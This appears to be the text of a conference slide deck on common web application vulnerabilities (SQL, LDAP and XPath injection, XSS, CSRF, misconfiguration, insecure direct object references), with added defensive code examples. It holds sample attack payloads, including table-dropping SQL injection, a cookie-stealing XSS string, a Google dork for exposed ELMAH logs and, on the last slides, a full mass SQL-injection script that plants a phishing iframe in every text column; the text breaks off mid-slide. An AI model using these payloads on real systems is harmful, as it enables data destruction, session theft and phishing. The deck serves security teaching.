![Page 1: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/1.jpg)
![Page 2: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/2.jpg)
Top Web Apps Security Vulnerabilities
Aleksandar Bozinovski, Technical Lead, Seavus
![Page 3: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/3.jpg)
![Page 4: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/4.jpg)
![Page 5: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/5.jpg)
Agenda
– Importance of Web Security
– HTTP, Sessions, Cookies
– Injection
– Cross Site Scripting (XSS)
– Cross-Site Request Forgery (CSRF)
– Security Misconfiguration
– Insecure Direct Object References
![Page 6: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/6.jpg)
Famous Quote
“Every program has at least two purposes: the one for which it was written, and another for which it wasn't.”
-Alan J. Perlis
Alan Jay Perlis was an American computer scientist known for his pioneering work in programming languages, and was the first recipient of the Turing Award, in 1966.
![Page 7: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/7.jpg)
Bobby Tables
The classic example: user input is concatenated straight into an INSERT statement (C#, ASP.NET Web Forms):

```csharp
string query = "INSERT INTO Students VALUES ('" + txtName.Text + "','" + txtSSN.Text + "')";
```

Attack: entering `Robert'); DROP TABLE Students;--` as the name produces

```sql
INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')
```

The quote and closing parenthesis in the input terminate the INSERT, the semicolon starts a second statement, and `--` comments out the rest of the original query (including the SSN value), so the database sees two valid statements.
![Page 8: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/8.jpg)
Another one
![Page 9: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/9.jpg)
Website Security Statistics
![Page 10: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/10.jpg)
HTTP
Hypertext Transfer Protocol – the language of the Web: the protocol used for communication between web browsers and web servers.
– Standard: RFC 1945 (HTTP/1.0), 1996; HTTP/1.1 followed in RFC 2616 (1999)
URL – Uniform Resource Locator (a form of Uniform Resource Identifier, URI)
Methods – GET, POST, PUT, HEAD, OPTIONS
![Page 11: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/11.jpg)
Statelessness, Cookies
By nature HTTP is a stateless protocol.
– i.e. from one web page to the next there is nothing in the protocol that lets a web application maintain program "state" (the way a desktop program does).
– State can be maintained by "witchery" or "trickery" where it is needed: cookies, hidden form fields, URL parameters, or server-side session storage keyed by a cookie.
Cookie – a piece of data sent from a website and stored in the user's web browser while the user is browsing that website.
– The server sets the cookie in a response (Set-Cookie header).
– The client includes the cookie in the Cookie request header on subsequent requests to the server.
– Example cookie: ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
– Whoever presents that value is the session: the server cannot tell the legitimate browser from an attacker who has copied the cookie, which is what session hijacking exploits.
![Page 12: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/12.jpg)
Session Cookie Hijacking
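An added example, not part of the original deck, showing the two sides of the hijacking problem using the slide's own session cookie value: an audit of the Set-Cookie header for the attributes that limit theft (Secure, HttpOnly, SameSite), and the Cookie header an attacker replays once the value is stolen. The header strings are constructed here; only the cookie name and value come from the slide.

```python
from http.cookies import SimpleCookie

# Constructed samples: the slide's session cookie as a server might issue it,
# once without hardening attributes and once with them.
WEAK_SET_COOKIE = "ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr; path=/"
HARDENED_SET_COOKIE = ("ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr; path=/; "
                       "Secure; HttpOnly; SameSite=Lax")


def audit_set_cookie(header_value):
    """Return {cookie_name: [missing attributes]} for one Set-Cookie header.

    Without Secure the value can be captured on a plain-HTTP request;
    without HttpOnly injected script (XSS) can read it and ship it out;
    without SameSite the browser attaches it to cross-site requests (CSRF).
    """
    jar = SimpleCookie()
    jar.load(header_value)
    report = {}
    for name, morsel in jar.items():
        missing = []
        if not morsel["secure"]:
            missing.append("Secure")
        if not morsel["httponly"]:
            missing.append("HttpOnly")
        if not morsel["samesite"]:
            missing.append("SameSite")
        report[name] = missing
    return report


def cookie_header_for_replay(header_value):
    """Build the Cookie request header an attacker sends after stealing the value.

    Attributes never travel back to the server; only name=value does. That is
    why possession of the value alone is enough to take over the session.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    return "; ".join("%s=%s" % (name, m.value) for name, m in jar.items())


if __name__ == "__main__":
    print(audit_set_cookie(WEAK_SET_COOKIE))
    print(audit_set_cookie(HARDENED_SET_COOKIE))
    print(cookie_header_for_replay(WEAK_SET_COOKIE))
```

The attributes do not stop a server from accepting a replayed cookie; they only narrow the ways the value can be obtained. Rotating the session id at login and expiring it on logout is what limits the damage once it has leaked.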
![Page 13: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/13.jpg)
OWASP Top 10
![Page 14: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/14.jpg)
Injection
OWASP Definition
– Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
![Page 15: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/15.jpg)
Injection Characteristics
![Page 16: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/16.jpg)
SQL Injection
Happens when we build a query but fail to validate and sanitize the untrusted input data that goes into it.
![Page 17: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/17.jpg)
SQL Queries
Queries constructed by concatenating strings are vulnerable to SQL Injection.

```csharp
var categoryId = Request.QueryString["CategoryId"];
var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId;
```

If we pass `7 OR 1=1` in the query string we end up with a query that returns every product:

```sql
SELECT * FROM Products WHERE CategoryID=7 OR 1=1
```

An attacker can use `;` to terminate the current command and run commands of their own (SQL Server, the target here, accepts such stacked statements; not every database driver does):

```sql
SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
```
![Page 18: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/18.jpg)
Prevent SQL Injection
– Validate untrusted data. If the input is supposed to be a number, convert it to a number or check it with a regex.
– Use parameterized SQL queries instead of string soup.
– Using stored procedures is also a good idea, but keep in mind that a stored procedure is just as vulnerable if it concatenates strings itself (dynamic SQL built with EXEC or sp_executesql from its arguments).
– Use ORMs (like Entity Framework) that parameterize queries for you and are therefore resistant to SQL Injection by default; their raw-SQL escape hatches still need parameters.
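An added example, not from the deck, that runs the slide's `CategoryID=` query against a constructed in-memory SQLite table three ways: concatenated as on the slide, bound as a parameter, and validated then bound. It also shows the stacked-query caveat: Python's sqlite3 driver refuses a second statement, so `7; DROP TABLE Products` fails here, whereas SQL Server would run it. Table contents and the `Products` schema are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory Products table standing in for the slide's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Products (ProductID INTEGER PRIMARY KEY, Name TEXT, CategoryID INTEGER);
        INSERT INTO Products VALUES (1, 'Chai', 7), (2, 'Chang', 7),
                                    (3, 'Tofu', 2), (4, 'Pavlova', 3);
    """)
    return conn


def products_concatenated(conn, category_id):
    """The slide's pattern: the query-string value is glued into the SQL text."""
    sql = "SELECT Name FROM Products WHERE CategoryID=" + category_id + " ORDER BY ProductID"
    return [row[0] for row in conn.execute(sql)]


def products_parameterized(conn, category_id):
    """Bind the value: it is data, never SQL text. Handing it the raw string
    '7 OR 1=1' shows that the injection attempt simply matches no row."""
    rows = conn.execute(
        "SELECT Name FROM Products WHERE CategoryID=? ORDER BY ProductID", (category_id,))
    return [row[0] for row in rows]


def products_validated(conn, category_id):
    """Validate the type first, then bind: anything non-numeric is rejected
    before a query is even built (returns None)."""
    if not category_id.isdigit():
        return None
    return products_parameterized(conn, int(category_id))


def stacked_query_survives(conn):
    """Does the slide's '7; DROP TABLE Products' destroy the table through this driver?

    sqlite3.execute() accepts one statement only and raises (Warning on older
    Pythons, ProgrammingError on newer ones), so the DROP never runs. On SQL
    Server the same input executes both statements.
    """
    try:
        products_concatenated(conn, "7; DROP TABLE Products")
    except (sqlite3.Warning, sqlite3.Error):
        pass  # driver refused the second statement
    count = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='Products'"
    ).fetchone()[0]
    return count == 1


if __name__ == "__main__":
    db = make_db()
    print(products_concatenated(db, "7"))          # ['Chai', 'Chang']
    print(products_concatenated(db, "7 OR 1=1"))   # every product
    print(products_parameterized(db, "7 OR 1=1"))  # []
    print(products_validated(db, "7 OR 1=1"))      # None
    print(stacked_query_survives(db))              # True on sqlite3
```

Do not read the sqlite3 result as "stacked queries are not a problem": the driver happened to refuse, the application did nothing to stop it. The parameterized and validated versions are the ones that hold on every database.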
![Page 19: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/19.jpg)
Other Injection Attacks
LDAP Injection
```csharp
string ldapSearch = "(cn=" + txtSearchTerm.Text + ")";
```
Dynamic LINQ Injection
```csharp
string where = "Table.Contains(\"" + search + "\")";
```
XPath Injection
```csharp
string loginExpression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
```
The pattern is the same every time: untrusted text is spliced into a string that a second interpreter parses, so the grammar of that interpreter (LDAP filter, LINQ expression, XPath) decides which characters let the input break out of its slot.
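An added example, not from the deck, for two of the three interpreters above. For LDAP it escapes the filter metacharacters the way RFC 4515 prescribes and rebuilds the slide's `(cn=…)` search; for XPath 1.0, which has no escape sequence inside string literals, it picks the quote style the value does not contain, or falls back to `concat()`. Where the engine offers parameters (XPath variables, LDAP libraries with filter templates) those are preferable; this is the fallback. The `(&(objectClass=person)…)` wrapper and the payload are assumptions.

```python
def ldap_escape_filter(value):
    """Escape a value for use inside an LDAP search filter (RFC 4515 section 3).

    The characters with meaning in filter syntax become backslash + two hex
    digits, so user input can never open or close a clause of its own.
    """
    out = []
    for ch in value:
        if ch in "\\*()\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def build_cn_filter(search_term, escape=True):
    """The slide's (cn=<term>) search, ANDed with an objectClass clause as
    real directory queries usually are; escape=False reproduces the bug."""
    term = ldap_escape_filter(search_term) if escape else search_term
    return "(&(objectClass=person)(cn=" + term + "))"


def xpath_string_literal(value):
    """Turn a value into an XPath 1.0 string literal that cannot break out.

    XPath literals have no escape for the quote that delimits them, so use the
    other quote kind when possible; if both appear, split on ' and concat().
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in parts) + ")"


def build_login_xpath(username, password):
    """The slide's login expression with both values emitted as safe literals."""
    return ("/employees/employee[loginID/text()=" + xpath_string_literal(username)
            + " and passwd/text()=" + xpath_string_literal(password) + "]")


# Constructed payloads
LDAP_PAYLOAD = "*)(uid=*"          # closes cn=, adds a clause matching every uid
XPATH_PAYLOAD = "' or '1'='1"      # the textbook tautology

if __name__ == "__main__":
    print(build_cn_filter(LDAP_PAYLOAD, escape=False))  # (&(objectClass=person)(cn=*)(uid=*))
    print(build_cn_filter(LDAP_PAYLOAD))                # (&(objectClass=person)(cn=\2a\29\28uid=\2a))
    print(build_login_xpath("bob", XPATH_PAYLOAD))
```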
![Page 20: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/20.jpg)
Cross-Site Scripting (XSS)
OWASP Definition
– XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
![Page 21: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/21.jpg)
XSS Characteristics
![Page 22: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/22.jpg)
Types of XSS Attacks
Stored XSS
• Stored attacks are those where the injected code is permanently stored on the target servers (in a database, message forum, comment field, visitor log).
• Users should not be able to create message content that causes another user to load an undesirable page or undesirable content when that message is retrieved.
Reflected XSS
• Reflected attacks are those where the injected code is reflected off the web server, such as in an error message or a search result.
• Reflected attacks are delivered to victims via another route, such as an e-mail message or a link on some other web server.
![Page 23: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/23.jpg)
Built-in protection
Modern browsers and servers employ many first-line defenses against XSS by default:
– ASP.NET Request Validation, present since version 2.0. In ASP.NET 4.0 it is enabled for all types of requests, not just pages. To turn that off we must revert to the older mode with requestValidationMode="2.0" on <httpRuntime>. It is a blacklist-style input filter, useful as a tripwire but not a substitute for output encoding.
– Output encoding. The MVC Razor view engine HTML-encodes everything emitted with @ by default. XSS is possible only if we bypass it with @Html.Raw(), or emit data into a context, such as an inline <script> block, where HTML encoding is the wrong encoding.
![Page 24: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/24.jpg)
Built-in protection
– The AntiXSS library is included by default in ASP.NET Web Forms 4.5 (System.Web.Security.AntiXss). It can be retrofitted on older web apps.
– Google Chrome had a built-in anti-XSS filter (the XSS Auditor) when this talk was given; it has since been removed from the browser, so the server-side encoding is the defense to rely on.
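An added example, not from the deck, of the output-encoding point above: the same reflected search term rendered raw (the @Html.Raw() case), HTML-encoded for a body context (what Razor's @ does), and encoded as a JavaScript string literal for an inline script. The HTML tokenizer inside a <script> element only looks for `</script` to end the element, which is why the JavaScript encoder rewrites `</` and why entity encoding would instead corrupt the value. The payload and templates are constructed.

```python
import html
import json

# Constructed payload: a reflected search term that tries to run script
PAYLOAD = '</script><script>alert(document.cookie)</script>'


def render_search_raw(term):
    """Unencoded output, the @Html.Raw() case: the payload becomes live markup."""
    return "<h2>Results for: " + term + "</h2>"


def render_search_encoded(term):
    """HTML body context, what Razor's @ does: < > & \" ' become entities."""
    return "<h2>Results for: " + html.escape(term, quote=True) + "</h2>"


def js_string_literal(value):
    """JavaScript string context: JSON-quote the value, then rewrite '</' as
    '<\\/' so the HTML parser cannot find a </script> end tag inside it.
    JSON's \\/ escape is valid JavaScript and decodes back to '/'."""
    return json.dumps(value).replace("</", "<\\/")


def render_search_js(term):
    """Inline script recording the last search term; HTML encoding would be
    the wrong tool here because the JS engine does not decode entities."""
    return "<script>var lastSearch = " + js_string_literal(term) + ";</script>"


def js_round_trips(value):
    """The encoded literal still carries the exact original value."""
    return json.loads(js_string_literal(value)) == value


def script_start_tags(markup):
    """Occurrences of a <script start tag in markup (case-insensitive)."""
    return markup.lower().count("<script")


def script_end_tags(markup):
    """Occurrences of a </script end tag in markup (case-insensitive)."""
    return markup.lower().count("</script")


if __name__ == "__main__":
    print(render_search_raw(PAYLOAD))
    print(render_search_encoded(PAYLOAD))
    print(render_search_js(PAYLOAD))
```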
![Page 25: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/25.jpg)
Cross-Site Request Forgery
OWASP Definition
– A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
![Page 26: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/26.jpg)
CSRF Characteristics
![Page 27: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/27.jpg)
How CSRF works
– Authenticated sessions are persisted via cookies
   • The cookie is sent with every request to the domain
– The attacking site recreates a legitimately formed request to the target site
   • Although the request carries a malicious payload (query string parameters or post data)
– The victim's browser is tricked into issuing the request
   • For all intents and purposes, the target website views it as a legitimate request
![Page 28: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/28.jpg)
CSRF Tokens
To mitigate this risk, we add unpredictability via a CSRF (anti-forgery) token.
The token is a random value that the legitimate page embeds in the form as a hidden field and that the server can also check against a copy it holds, either in the session or in a cookie it set in the browser. The attacking site cannot read that value cross-origin, so its forged request arrives without a matching token and is rejected.
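An added example, not from the deck, of the token check in its double-submit form: the server issues a random token, sends it as a cookie and writes it into the legitimate form; on a state-changing request the two copies must match, compared in constant time. The forged request from the attacking site carries the victim's cookies automatically but cannot supply the hidden field. The transfer endpoint, the `demo()` scenario and the cookie name are constructed; `__RequestVerificationToken` is the field name ASP.NET MVC uses and is assumed here for the cookie as well.

```python
import hmac
import secrets

TOKEN_NAME = "__RequestVerificationToken"   # name borrowed from ASP.NET MVC; any name works


def issue_token():
    """Fresh random token, created once per session (or per form render)."""
    return secrets.token_urlsafe(32)


def render_form(token):
    """The legitimate page: the token travels in a hidden field as well as the cookie."""
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="%s" value="%s">'
            '<input name="amount"><input name="to"><button>Send</button></form>'
            % (TOKEN_NAME, token))


def verify_request(cookies, form):
    """Double-submit check: the cookie copy (attached automatically by the
    browser) must equal the hidden-field copy (only our own page can include
    it, because another origin cannot read our cookie)."""
    cookie_token = cookies.get(TOKEN_NAME, "")
    form_token = form.get(TOKEN_NAME, "")
    if not cookie_token or not form_token:
        return False
    return hmac.compare_digest(cookie_token, form_token)  # constant-time compare


def transfer(cookies, form):
    """State-changing action guarded by the check."""
    if not verify_request(cookies, form):
        return "rejected"
    return "transferred %s to %s" % (form["amount"], form["to"])


def demo():
    """Constructed scenario: one legitimate post, one forged, one with a guessed token."""
    token = issue_token()
    victim_cookies = {"ASP.NET_SessionId": "haay355s5g0vm5zotvlncqpr", TOKEN_NAME: token}
    legit = {"amount": "10", "to": "alice", TOKEN_NAME: token}
    forged = {"amount": "1000", "to": "mallory"}                       # no token at all
    guessed = {"amount": "1000", "to": "mallory", TOKEN_NAME: issue_token()}  # wrong token
    return (transfer(victim_cookies, legit),
            transfer(victim_cookies, forged),
            transfer(victim_cookies, guessed))


if __name__ == "__main__":
    print(demo())   # ('transferred 10 to alice', 'rejected', 'rejected')
```

The check is only as good as the cookie it rides on: if the token cookie can be set by an attacker (a sibling subdomain, cookie injection), bind the token to the session on the server instead of trusting the cookie copy. Marking the session cookie SameSite adds a second, independent layer because the browser then omits it from cross-site posts.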
![Page 29: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/29.jpg)
Security Misconfiguration
OWASP Definition
– Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained, as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
![Page 30: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/30.jpg)
Characteristics
![Page 31: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/31.jpg)
Keep up to date
Your servers
– Windows Server 2012 is arguably more secure than Windows Server 2003
Client browsers (if applicable)
– Modern browsers include built-in defenses against the most prevalent attacks
Keep your frameworks up to date
![Page 32: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/32.jpg)
Set Custom Errors, hide the YSOD (the "yellow screen of death": ASP.NET's default error page, which shows the exception, stack trace and source line to whoever triggered it)
![Page 33: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/33.jpg)
Turn Off Tracing (trace.axd lists recent requests with their headers, cookies and form data)
![Page 34: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/34.jpg)
Also don’t forget to turn off
ELMAH
– Cases with unprotected ELMAH handlers are notorious: the error detail pages include request headers, cookies and server variables, so an open elmah.axd can hand out session cookies.
– Google dork: inurl:"elmah.axd"
DEBUG
– Performance penalties
– Although not a direct security risk on its own, beware of #if DEBUG statements that can disclose information
![Page 35: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/35.jpg)
Also don’t forget to turn off
Script execution on folders where it is not needed
– Usually folders where various documents or uploaded files are kept, unless you use the App_Data folder (which IIS never serves).
HTTP access to logs
– Log files can disclose many sensitive details about your web app. It's best to keep them outside of the web app root. If that is not possible, at least keep them in App_Data.
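An added example, not from the deck, collecting the settings from the preceding slides into one hardened web.config; each comment names the weak value it replaces. The folder names (Uploads, Logs), the Administrators role and ~/Error.aspx are assumptions, and the ELMAH section declaration is the one ELMAH's own package adds.

```xml
<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="elmah">
      <section name="security" requirePermission="false"
               type="Elmah.SecuritySectionHandler, Elmah" />
    </sectionGroup>
  </configSections>

  <system.web>
    <!-- was: mode="Off" (stack traces and source lines served to every client) -->
    <customErrors mode="RemoteOnly" defaultRedirect="~/Error.aspx" />
    <!-- was: enabled="true" localOnly="false" (trace.axd readable from anywhere) -->
    <trace enabled="false" localOnly="true" />
    <!-- was: debug="true" (slower, and #if DEBUG code paths compiled in) -->
    <compilation debug="false" />
  </system.web>

  <!-- ELMAH: keep the log, but never serve it remotely and only to administrators -->
  <elmah>
    <security allowRemoteAccess="false" />
  </elmah>
  <location path="elmah.axd">
    <system.web>
      <authorization>
        <allow roles="Administrators" />
        <deny users="*" />
      </authorization>
    </system.web>
  </location>

  <!-- Upload folder: static content only; no script or execute handlers run here -->
  <location path="Uploads">
    <system.webServer>
      <handlers accessPolicy="Read" />
    </system.webServer>
  </location>

  <!-- Log folder that had to stay under the web root: hide it from requests
       entirely (App_Data is protected the same way by default) -->
  <system.webServer>
    <security>
      <requestFiltering>
        <hiddenSegments>
          <add segment="Logs" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
```

On production servers `<deployment retail="true" />` in machine.config forces debug off, tracing off and custom errors on for every site on the box, regardless of what an individual web.config says; it is the setting that survives a developer's accidental check-in.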
![Page 36: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/36.jpg)
Insecure Direct Object References
OWASP Definition
– A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
![Page 37: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/37.jpg)
Characteristics
![Page 38: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/38.jpg)
Direct Object References
– A direct object reference is an observable key used to identify an individual record in a database
   • http://northwind.com/Products?catId=1
   • http://northwind.com/Products?catId=3
   • http://northwind.com/Products?catId=8
![Page 39: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/39.jpg)
Direct Object References
– Another example
   • http://webapp.com/Download?f=DSC01031.JPG
   • http://webapp.com/Download?f=DSC01032.JPG
   • http://webapp.com/Download?f=DSC01033.JPG
![Page 40: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/40.jpg)
Prevention
Implement proper access control
– Validate user data
– Implement security checks before using an object reference: does the current user own, or have rights to, this particular record?
Access via undiscoverable surrogate keys
– Integer and natural string keys are vulnerable to enumeration
– A surrogate key that is not pattern-based adds obfuscation
   • A GUID is a good example
– However, this is security through obscurity: it slows enumeration down but does not replace the access control check
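An added example, not from the deck, using the slide's Download?f= file names: the lookup without a check, the same lookup with an ownership check that also refuses to reveal whether a file exists, the enumeration an attacker runs over sequential ids, and random surrogate keys in the URL with the access check kept underneath them. The file table, owners and the surrogate mapping are constructed.

```python
import uuid

# Constructed data: which user uploaded which file
FILES = {
    1: {"name": "DSC01031.JPG", "owner": "alice"},
    2: {"name": "DSC01032.JPG", "owner": "bob"},
    3: {"name": "DSC01033.JPG", "owner": "alice"},
}


def download_idor(file_id):
    """The slide's Download?f=... pattern: any valid id is served to anyone."""
    rec = FILES.get(file_id)
    return rec["name"] if rec else None


def download_checked(current_user, file_id):
    """Same lookup, but the reference is used only after the access check.
    'Not yours' and 'does not exist' give the same answer, so the endpoint
    cannot be used as an oracle for which ids are valid."""
    rec = FILES.get(file_id)
    if rec is None or rec["owner"] != current_user:
        return None
    return rec["name"]


def enumerate_ids(fetch, start=1, stop=10):
    """What an attacker does with sequential keys: walk the range and keep hits."""
    found = {}
    for i in range(start, stop):
        name = fetch(i)
        if name is not None:
            found[i] = name
    return found


# Surrogate keys: random UUIDs replace the sequential ids in URLs. They are
# not guessable, but they are still only a lookup key, so the check stays.
SURROGATE_TO_ID = {str(uuid.uuid4()): fid for fid in FILES}
ID_TO_SURROGATE = {fid: key for key, fid in SURROGATE_TO_ID.items()}


def download_by_surrogate(current_user, key):
    """Resolve the opaque key, then apply exactly the same ownership check."""
    fid = SURROGATE_TO_ID.get(key)
    if fid is None:
        return None
    return download_checked(current_user, fid)


if __name__ == "__main__":
    print(enumerate_ids(download_idor))                            # all three files
    print(enumerate_ids(lambda i: download_checked("alice", i)))   # only alice's
    print(download_by_surrogate("bob", ID_TO_SURROGATE[2]))         # DSC01032.JPG
    print(download_by_surrogate("alice", ID_TO_SURROGATE[2]))       # None
```

Returning the same None for a foreign record and a missing one costs nothing in the legitimate flow and removes the easiest way of telling which ids are worth attacking. If the check has to live in one place, put it in the data access layer so every endpoint that resolves a reference inherits it.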
![Page 41: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/41.jpg)
Real example: phishing with obfuscated SQL injection and XSS
-- 1. The malicious query appends a script tag to every text value in every user table in the database
```sql
DECLARE @T varchar(255), @C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and b.name not like '%username%' and b.name not like '%password%'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + '' <script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like ''%http://codecamp.local/EvilSite/Login.aspx%''');
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
```
The cursor walks every text-typed column (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar) of every user table (xtype 'u'), skipping username and password columns so logins keep working and nothing looks broken. Wherever the site later renders one of those values unencoded, the stored XSS fires and the script (which assumes jQuery is loaded on the page) covers the whole viewport with an iframe of the attacker's look-alike login page: a phishing form served from inside the legitimate site.
![Page 42: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/42.jpg)
Real example: phishing with obfuscated SQL injection and XSS
-- 2. The query is written as one single-quoted string (every quote inside it doubled)
```sql
